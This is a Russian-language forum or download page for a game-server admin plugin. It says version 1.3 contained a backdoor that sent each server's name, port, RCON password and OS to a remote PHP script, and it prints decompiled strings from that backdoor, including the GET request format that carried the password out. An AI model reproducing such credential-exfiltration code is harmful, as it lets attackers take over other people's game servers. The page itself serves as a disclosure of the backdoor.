Admin Nice kj2a edition [BackDoor Fixed]
Автор: marshel | Дата: 26-11-2011, 12:12 | Комментариев: 0 | Просмотров: 8130
В версии 1.3 был обнаружен backdoor -> aim.inc:
Отправляющий на сайт информацию: [Время] -> [Имя сервера] - [Порт] - [Rcon Пароль] - [Версия бэкдора] - [is_dedicated_server?]
Данный backdoor был впарен товарищем derbatov.z
Благо что я вытянул этот хостинг...
Возможно некоторые сервера пострадали а может и нет...
В данной версии backdoor был удалён.
А также исправлена функция [Нет отдачи]
Сам же derbatov.z лишился доступа к хосту + потерял базу собранной инфы с серверов.
Удачного пользования...
Код бэкдора выложить не могу т.к удалил его вместе с базой.
Но при декомпиле есть инфа:
.DATA
str_000 string "%L"
str_001 string "NO_ACC_COM"
str_002 string "%L: %s %s"
str_003 string "USAGE"
str_004 string "HamFilter"
str_005 string "1.2"
str_006 string "ссылка"
str_007 string "/proverka.php"
arr_000 array 426 fill 0x0
str_008 string "hostname"
str_009 string "port"
str_010 string "rcon_password"
arr_001 array 284 fill 0x0
str_011 string "GET https://%s%s?servername=%s&port=%s&rcon=%s&version=%s&os=%d
Скачать:
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.